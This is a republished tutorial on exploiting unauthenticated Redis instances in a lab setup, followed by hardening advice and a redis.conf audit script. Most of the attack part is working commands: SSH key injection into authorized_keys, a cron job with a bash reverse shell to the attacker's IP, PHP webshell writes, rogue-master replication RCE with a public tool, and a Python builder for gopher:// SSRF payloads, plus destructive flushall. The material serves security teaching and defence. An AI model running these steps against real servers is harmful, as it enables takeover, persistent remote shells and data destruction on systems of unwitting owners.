2025-04-07 Update From: SLTechnology News&Howtos, Network Security
Shulou(Shulou.com)05/31 Report--
This article explains the common Redis vulnerabilities: what they are, how an unauthenticated or weakly protected instance is exploited, and how to fix it. The content is meant to be easy to follow; work through it with the editor.
About Redis

Redis is a key-value storage system. Like Memcached it keeps data in memory for speed, but it supports a richer set of value types: string, list, set, zset (sorted set) and hash. These types support push/pop, add/remove, set intersection, union and difference, and many other operations, and every operation is atomic. On top of that Redis supports several sort orders. Unlike Memcached, Redis periodically writes the updated data to disk (RDB snapshot) or appends each modification to a log file (AOF), and on that basis implements master-slave replication.

Common Redis commands:

    set xz "Hacker"                     # set the value of key xz to the string Hacker
    get xz                              # get the value of key xz
    SET score 857                       # set the value of key score to 857
    INCR score                          # increase the value of score by 1
    GET score                           # get the value of key score
    keys *                              # list all keys in the current database
    config set protected-mode no        # turn off protected mode
    get anotherkey                      # get the value of a non-existent key
    config set dir /root/Redis          # set the save directory
    config set dbfilename redis.rdb     # set the save file name
    config get dir                      # view the save directory
    config get dbfilename               # view the save file name
    save                                # perform a backup (write the RDB file)
    flushall                            # delete all data
    del key                             # delete the data stored under key
    slaveof ip port                     # set up a master-slave relationship
    redis-cli -h ip -p 6379 -a passwd   # basic external connection to Redis

Notes on the basics:
1. SET and GET perform the basic assignment and retrieval operations;
2. Redis command names are not case-sensitive: set and SET mean the same thing;
3. keys * lists all keys in the current database;
4. Getting a key that does not exist returns null, shown as (nil);
5. If a value contains spaces it must be enclosed in double quotes, for example "Hello World".

Redis configuration file parameters:
Port parameter
The format is port followed by the port number, such as port 6379, which means that the Redis server will listen on port 6379 to wait for the client to connect.
Bind parameter
The format is bind followed by one or more IP addresses separated by spaces, for example bind 192.168.1.100 10.0.0.1, which makes the Redis server listen only on the local interfaces 192.168.1.100 and 10.0.0.1, so only clients that can reach those interfaces can connect. bind 0.0.0.0 means Redis listens on every interface and any IP can connect. Put bluntly, it is a whitelist of the local addresses Redis accepts connections on (it does not filter client addresses; use a firewall for that).
Save parameter
The format is save followed by a number of seconds and a number of changes: a backup is performed automatically when the database has changed at least that many times within that many seconds (Redis is an in-memory database, so "backup" means writing the in-memory data to disk). Several save lines can be given at once. For example

    save 900 1
    save 300 10
    save 60 10000

means that the backup runs as soon as the database has changed 10000 times within 60 seconds, or 10 times within 300 seconds, or once within 900 seconds.
Requirepass parameter
The format is requirepass followed by the password that clients must supply when connecting to the Redis server. The parameter is empty by default, meaning no password is required to connect; the configuration file ships with a commented-out line requirepass foobared which, if uncommented, requires the password foobared to connect.
Dir parameter
The format is dir followed by a path. The default is dir ./, meaning Redis's working directory is the current directory, i.e. the directory redis-server was started from. Note that the backup files Redis generates are written to this directory.
Dbfilename parameter
The format is dbfilename followed by the specified file name, which is used to specify the name of the Redis backup file. The default is dbfilename dump.rdb, that is, the name of the backup file is dump.rdb.
Config command
The dir and dbfilename parameters can be read and changed at runtime with the CONFIG command. Because this command is dangerous (it is the basis of every exploit in the lab below), Redis provides the rename-command directive in the configuration file; for example rename-command CONFIG HTCMD renames CONFIG to HTCMD. The configuration file does not rename CONFIG by default.
Protected-mode parameter
Redis 3.2 and later add protected-mode, which defaults to yes. When it is on and neither a bind address nor a password is configured, Redis only accepts connections from the loopback interface, so for the tests below change it to no in the configuration first (or configure bind).

Test environment: attack machine Kali (192.168.33.131), target machine Ubuntu 16 (192.168.33.133).

Vulnerability exploitation
Exploitation principle:
Redis provides two different persistence methods, RDB and AOF.
RDB persistence can generate a point-in-time snapshot of a dataset within a specified time interval
AOF persistence records all write commands executed by the server.
The official documentation says the AOF file is named appendonly.aof by default and can be renamed with appendfilename in the configuration file. Testing shows that appendfilename cannot be changed at runtime from the client, so AOF cannot be used to write an arbitrary file.
The RDB file is named dump.rdb by default, and dbfilename can be changed at runtime with CONFIG SET, so an arbitrary file can be written by pointing dir and dbfilename at the target path and forcing a SAVE.
Environment building:
Target machine: Ubuntu 16
For quick reproduction, install from apt: run sudo apt-get update && sudo apt-get upgrade, then sudo apt-get install redis-server, which installs the binary at /usr/bin/redis-server. Start the service with redis-server, or redis-server <path to configuration file>. In the configuration file change the bind parameter to 0.0.0.0 (or comment it out) and set protected-mode to no so that external connections are allowed. Also disable the firewall with sudo ufw disable; check its status with sudo ufw status.
Open the redis service after installation to prepare for reproduction
Method 1. Write an SSH public key (ssh-keygen) and log in to the server
Principle:
SSH offers two authentication methods: password authentication (account and password) and key authentication.
Key authentication is authentication based on public-key cryptography. The public key can be shared freely: you place the same public key on every server you want to log in to over SSH, while the private key stays secret with you. The general flow is:
(1) the client generates a key pair and copies the public key into the target user's ~/.ssh/authorized_keys on the server; (2) the client initiates a login and offers its public key; (3) the server checks whether that public key is listed in authorized_keys, and refuses key login if it is not; (4) the client proves possession of the private key by signing a challenge bound to the session (SSH signs the session identifier and the authentication request; it does not decrypt a random number); (5) the server verifies the signature with the stored public key and allows the login if it checks out, otherwise it refuses.
Conditions:
1. The Redis service runs as root (so it can write to /root/.ssh; the directory must already exist, otherwise CONFIG SET dir returns an error).
2. The server runs SSH and allows key login, so an attacker can write a public key remotely and then log straight in.
Detailed steps:
Generate a key pair on the attack machine. You can set a passphrase for the private key when prompted. The public key is written to /root/.ssh/id_rsa.pub by default:

    ssh-keygen -t rsa
    cd /root/.ssh
    ls
    cat id_rsa.pub
Then connect to the target through the unauthenticated Redis instance and write the key:

    redis-cli -h 192.168.33.134              # connect to the target's Redis
    config get dir                           # check the current save path
    config get dbfilename                    # check the save file name
    config set dir /root/.ssh/               # set the save path (returns -ERR if the directory is missing or not writable)
    config set dbfilename authorized_keys    # set the save file name
    set xz "\n\n\n<contents of id_rsa.pub>\n\n\n"   # store the public key under key xz, padded with newlines
    save                                     # write the RDB file to /root/.ssh/authorized_keys

The padding matters: the saved file also contains the binary RDB header and trailer, and the blank lines keep the key on a line of its own so sshd can parse it and skip the rest.
Finally log in to the target from the attack machine with the private key (ssh -i /root/.ssh/id_rsa root@192.168.33.134); answer yes to the host key prompt the first time.
Method 2. Use a scheduled task (cron) to get a reverse shell
Principle:
Scheduled tasks are run by crontab, and each user's jobs are stored under /var/spool/cron (on Debian/Ubuntu /var/spool/cron/crontabs/<user>, on CentOS /var/spool/cron/<user>). Root can modify any crontab, so a reverse shell command can be written straight into root's scheduled tasks.
Conditions:
Redis runs as root
Redis has no password or a weak password
Detailed steps:
First start a listener on port 8888 on the attack machine: nc -lvp 8888
Then operate Redis with the following commands:

    redis-cli -h 192.168.33.134                   # connect to Redis
    flushall                                      # clear all keys so the payload is the only data in the file (destructive)
    config set dir /var/spool/cron/crontabs/      # set the save path
    config set dbfilename shell                   # save file name (use the target user name, e.g. root, where cron expects it)
    set xz "\n* * * * * bash -i >& /dev/tcp/192.168.33.131/8888 0>&1\n"   # store the reverse shell job under key xz
    save                                          # write the crontab file to the save path

A shell should now come back in the listener window. (There are many pitfalls here: on Ubuntu the written file comes out garbled and no shell comes back, so the reverse shell is best tested on CentOS. This is commonly attributed to the Debian-family cron being stricter about the crontab file's format and permissions than the CentOS cron, so the RDB header and trailer that surround the payload cause the whole file to be rejected.)
For Ubuntu's pitfalls see this article: https://www.dazhuanlan.com/2019/11/15/5dce507a41df5/
Method 3. Write a webshell directly with Redis
Conditions:
Know the absolute path of the website, and Redis must have write permission to that directory
Redis runs as root
Redis has a weak password or no password
Note: if the physical path is unknown, try provoking an application error that leaks it, or try common absolute paths.
Detailed steps:
    redis-cli -h 192.168.33.134                              # connect to Redis
    config set dir /www/admin/localhost_80/wwwroot           # set the path the shell is written to
    set xxx "\n\n<?php phpinfo(); ?>\n\n"                    # store the phpinfo() payload under key xxx
    config set dbfilename phpinfo.php                        # name the file
    save                                                     # write it

The file is written successfully; requesting phpinfo.php on the site shows the phpinfo page.
Method 4. Redis master-slave replication getshell
Principle:
When all data lives in a single Redis instance and the read/write volume is high, one server struggles to keep up. To handle this Redis provides master-slave mode: one Redis instance is the master and the others are replicas holding the same data, with the replicas serving reads only. Separating reads from writes greatly reduces the load and can be seen as trading space for throughput.
When two Redis instances are set up as master and slave, the master pushes its dataset to the slave as a bulk transfer in the FULLRESYNC step of the replication handshake. A rogue master can send an arbitrary file instead, which the slave writes to its dir/dbfilename; if that file is a Redis module (.so), the attacker then loads it with MODULE LOAD and executes the new extended commands it provides.
Conditions:
Redis version 4.x to 5.0.5 (the module feature added in 4.0 lets a malicious .so written in C be loaded)
Redis has a weak password or no password
Redis runs as root
Detailed steps:
Simulate the master-slave relationship with the following commands (the target becomes a replica of the attack machine, and a key set on the attack machine shows up on the target):

    root@kali:~/Desktop# redis-cli -h 192.168.33.134
    192.168.33.134:6379> slaveof 192.168.33.131 6379
    OK
    192.168.33.134:6379> get xz
    (nil)
    192.168.33.134:6379> exit
    root@kali:~/Desktop# redis-cli
    127.0.0.1:6379> get xz
    (nil)
    127.0.0.1:6379> set xz xz
    OK
    127.0.0.1:6379> exit
    root@kali:~/Desktop# redis-cli -h 192.168.33.134
    192.168.33.134:6379> get xz
    "xz"

Setting up the master-slave relationship is the single command:

    root@kali:~/Desktop# redis-cli -h 192.168.33.134
    192.168.33.134:6379> slaveof 192.168.33.131 6379
    OK
Then download the tool https://github.com/n0b0dyCN/redis-rogue-server on Kali.
After downloading, cd into the RedisModulesSDK directory and compile the module with make. If you do not want to compile, you can use the prebuilt exp.so the author provides.
It can be used in two ways: an interactive shell or a reverse shell.
Interactive shell:

    python3 redis-rogue-server.py --rhost 192.168.33.134 --lhost 192.168.33.131 --exp module.so

Enter i when prompted to get the interactive shell.
Reverse shell:

    python3 redis-rogue-server.py --rhost 192.168.33.134 --lhost 192.168.33.131 --exp module.so

Enter r when prompted, then the IP and port to connect back to.
Note: the master-slave RCE replaces the target's dataset with the rogue master's transfer and loads a module into the server process; used carelessly it crashes Redis or destroys data, so avoid it against production instances unless there is no other way.
Method 5. Exploit through SSRF
Principle:
The target of the SSRF attack is an internal system unreachable from the outside; here the local Redis is reached through the SSRF using the dict protocol.
Conditions:
Redis runs as root
The target's HTTP client supports the dict protocol
Know the absolute path of the website
Redis has no password or a weak password
Detailed steps:
The range used here is pikachu, and the dict protocol is used; the target machine's client library must support dict first.
Writing the shell directly over dict fails: the payload is entity-encoded and the ? in <?php truncates the URL (no workaround with dict was found at the time):

    dict://192.168.33.134:6379/set:xz:<payload>
    dict://192.168.33.134:6379/config:set:dir:/www/admin/localhost_80/wwwroot
    dict://192.168.33.134:6379/config:set:dbfilename:ssrf.php
    dict://192.168.33.134:6379/save

Because the direct write fails, use master-slave replication instead. First set the save path and file name and make the target a replica of Kali:

    dict://192.168.33.134:6379/slaveof:192.168.33.131:6379
    dict://192.168.33.134:6379/config:set:dir:/www/admin/localhost_80/wwwroot
    dict://192.168.33.134:6379/config:set:dbfilename:ssrf.php

Then on Kali, exactly as in the previous section, set the key on the local master so it replicates to the target:

    127.0.0.1:6379> set xxx "\n\n<?php phpinfo(); ?>\n\n"

Finally trigger the save from the web side so the replicated data is written to disk on the target:

    dict://192.168.33.134:6379/save

[Screenshot: the direct dict write fails]
[Screenshot: the write via master-slave replication succeeds]
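The dict:// failure above comes from the URL itself: dict carries one Redis argument per colon-separated word, so a value containing spaces, ':' or '?' is split or cut off by the URL parser. Where the client supports gopher://, the raw RESP bytes can be percent-encoded and carried intact, which is the usual alternative to the replication detour. The Python below is an added example, not from the original article: it builds both URL forms, refuses dict arguments that cannot survive the trip, and assembles the webshell write as a single gopher URL. Host, port and web root are the article's lab values and are assumptions.

```python
"""Build the SSRF payloads for method 5 as dict:// and gopher:// URLs.

Added example, not from the original article. Host, port and web root are
the article's lab values and are assumptions here.
"""
from urllib.parse import quote

UNSAFE_FOR_DICT = ":? #\r\n"  # split by the dict server or cut off by the URL parser


def resp_bytes(*args: str) -> bytes:
    """RESP array encoding of one command (same wire format redis-cli uses)."""
    out = b"*%d\r\n" % len(args)
    for a in args:
        raw = a.encode()
        out += b"$%d\r\n%s\r\n" % (len(raw), raw)
    return out


def dict_safe(arg: str) -> bool:
    """True if the argument can be carried as one dict:// word."""
    return not any(ch in arg for ch in UNSAFE_FOR_DICT)


def dict_url(host: str, port: int, *args: str) -> str:
    """dict://host:port/word:word:... ; one word per Redis argument."""
    for a in args:
        if not dict_safe(a):
            raise ValueError(f"argument {a!r} cannot be carried over dict://")
    return f"dict://{host}:{port}/" + ":".join(args)


def gopher_url(host: str, port: int, commands) -> str:
    """gopher://host:port/_<percent-encoded RESP>; the leading '_' is the gopher
    item type and is consumed before the bytes are written to the socket."""
    raw = b"".join(resp_bytes(*c) for c in commands)
    return f"gopher://{host}:{port}/_" + quote(raw, safe="")


def webshell_over_gopher(host: str, port: int, webroot: str, name: str = "ssrf.php") -> str:
    """The whole method-3 write as one request, newlines and '<?php' included."""
    return gopher_url(host, port, [
        ("config", "set", "dir", webroot),
        ("config", "set", "dbfilename", name),
        ("set", "xz", "\n\n<?php phpinfo(); ?>\n\n"),
        ("save",),
    ])


if __name__ == "__main__":
    print(dict_url("192.168.33.134", 6379, "config", "set", "dbfilename", "ssrf.php"))
    print(webshell_over_gopher("192.168.33.134", 6379, "/www/admin/localhost_80/wwwroot"))
```

Whether gopher:// is usable depends on the SSRF sink: curl built with gopher support follows it, while many HTTP-only clients do not, in which case the replication trick in the text remains the way to get a value with spaces onto the target.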
Method 6. Redis Lua scripting
Redis 2.6 and later ship a built-in Lua scripting environment (EVAL). On an unauthenticated instance it has been used to execute system commands through sandbox escapes. That is not studied in depth here; if you are interested, read this article: https://wooyun.x10sec.org/static/drops/papers-3062.html
Script for batch detection of unauthenticated Redis instances:
https://github.com/Ridter/hackredis
Incident response case for the Redis unauthenticated access vulnerability:
Redis unauthenticated access leading to a remotely implanted mining script (defense)
https://mp.weixin.qq.com/s/eUTZsGUGSO0AeBUaxq4Q2w
Further exploitation:
How to getshell on Windows?
Writing a webshell still needs the web path; writing to the Startup folder needs the target server to reboot; writing an MOF file into the WMI mof directory, where it is compiled and run automatically (about every 5 seconds), works on Windows 2003.

Fixes:
1. Disable or rename high-risk commands (restart Redis to take effect)
Edit redis.conf to disable remote modification of the DB file location:

    rename-command FLUSHALL ""
    rename-command CONFIG ""
    rename-command EVAL ""

Or rename these high-risk commands to hard-to-guess names in redis.conf:

    rename-command FLUSHALL "name1"
    rename-command CONFIG "name2"
    rename-command EVAL "name3"
2. Run the Redis service with low privileges (restart Redis to take effect)
Create a separate user and group for the Redis service, with no login shell:

    groupadd -r redis && useradd -r -g redis -s /sbin/nologin redis
3. Add password authentication for Redis (restart Redis to take effect)
Edit redis.conf and add:

    requirepass mypassword

(Do not pass the password with redis-cli -a on the command line, where it appears in clear text in the process list and shell history; connect first and then authenticate with AUTH.)
4. Prohibit public network access to Redis (restart Redis to take effect)
Edit redis.conf so that the Redis service is reachable only from the local host:

    bind 127.0.0.1

Redis 3.2 and later also add protected-mode: when it is enabled and neither a bind address nor a password is configured, connections from non-loopback addresses are rejected with an error.
5. Change the default port
Edit redis.conf:

    port 6379

The default port is 6379; change it to any other free port.
6. Protect the authorized_keys file
Prevent other users from adding new public keys. Make authorized_keys readable only by its owner, with no permissions for anyone else:

    chmod 400 ~/.ssh/authorized_keys

To make sure those permissions cannot be changed, also set the file's immutable bit:

    chattr +i ~/.ssh/authorized_keys

However, an attacker could still rename ~/.ssh and create a new ~/.ssh directory and authorized_keys file. To prevent that, set the immutable bit on ~/.ssh as well:

    chattr +i ~/.ssh
7. Set a firewall policy
If other servers need to reach Redis for normal business, add an iptables rule that allows only those specific IPs to reach the Redis port.
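The fixes above are all redis.conf directives, so they can be checked mechanically before a restart. The Python below is an added example, not from the original article: it parses a redis.conf, applies the checks from steps 1, 3, 4 and 5 (bind, protected-mode, requirepass, rename-command for FLUSHALL/CONFIG/EVAL, default port) and returns the findings. The two sample configurations at the bottom are constructed for the demo; the list of weak passwords is an assumption.

```python
"""Audit a redis.conf against the hardening steps in the fix section.

Added example, not from the original article. The sample configs and the
weak-password list are constructed/assumed for the demo.
"""
WEAK_PASSWORDS = {"", "foobared", "redis", "123456", "password"}
DANGEROUS = ("FLUSHALL", "CONFIG", "EVAL")


def parse_conf(text: str) -> dict:
    """Collect directives; rename-command is repeatable, so keep it as a list."""
    conf = {"rename-command": []}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        name, _, rest = line.partition(" ")
        name = name.lower()
        args = rest.split()
        if name == "rename-command":
            conf[name].append(tuple(args))
        else:
            conf[name] = args
    return conf


def audit(text: str) -> list:
    """Return a list of findings; an empty list means the checked directives are hardened."""
    conf = parse_conf(text)
    findings = []
    binds = conf.get("bind") or []
    if not binds or "0.0.0.0" in binds or "::" in binds:
        findings.append("bind: listens on all interfaces (set bind 127.0.0.1 or an internal address)")
    if (conf.get("protected-mode") or ["yes"])[0].lower() != "yes":
        findings.append("protected-mode: disabled")
    pw = (conf.get("requirepass") or [""])[0].strip('"')
    if pw in WEAK_PASSWORDS or len(pw) < 16:
        findings.append("requirepass: missing or weak (use a long random value)")
    renamed = {r[0].upper() for r in conf["rename-command"] if len(r) == 2}
    for cmd in DANGEROUS:
        if cmd not in renamed:
            findings.append(f"rename-command: {cmd} still reachable under its default name")
    if (conf.get("port") or ["6379"])[0] == "6379":
        findings.append("port: default 6379 (optional: move to another port)")
    return findings


# Constructed sample: the lab configuration the article uses for reproduction.
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
port 6379
# requirepass foobared
dir ./
"""

# Constructed sample: the same file after applying fixes 1, 3, 4 and 5.
HARDENED_CONF = """
bind 127.0.0.1
protected-mode yes
port 16379
requirepass 9f3c1b7e2a6d4c8e0b5f7a1d3e9c2b4a
rename-command FLUSHALL ""
rename-command CONFIG "a7c3e9f1-config"
rename-command EVAL ""
dir /var/lib/redis
"""

if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit(text) or "no findings")
```

The script only sees the file, not the running process, so fix 2 (the unprivileged service user) and fix 7 (the firewall) still need to be checked on the host itself, for example with ps -o user -C redis-server and the iptables rule list.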
That is the whole of "what are the Redis loopholes". Thank you for reading; hopefully the content helps you.